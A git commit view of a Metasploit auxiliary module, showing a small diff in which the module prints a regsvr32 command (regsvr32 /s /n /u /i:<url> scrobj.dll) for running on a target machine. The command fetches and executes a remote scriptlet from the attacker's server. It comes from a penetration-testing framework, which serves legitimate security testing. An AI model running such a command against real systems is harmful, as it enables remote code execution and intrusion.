Better fix to the missing command output bug

bug/bundler_fix
Trenton Ivey 2016-06-15 05:27:27 -05:00
parent 791ab7a615
commit 90f84d9883
1 changed files with 5 additions and 2 deletions

View File

@ -38,10 +38,13 @@ class MetasploitModule < Msf::Auxiliary
def run
start_service
exploit
end
def primer
print_status("Run the following command on the target machine:")
print_line("regsvr32 /s /n /u /i:#{get_uri} scrobj.dll")
self.service.wait
end
def on_request_uri(cli, _request)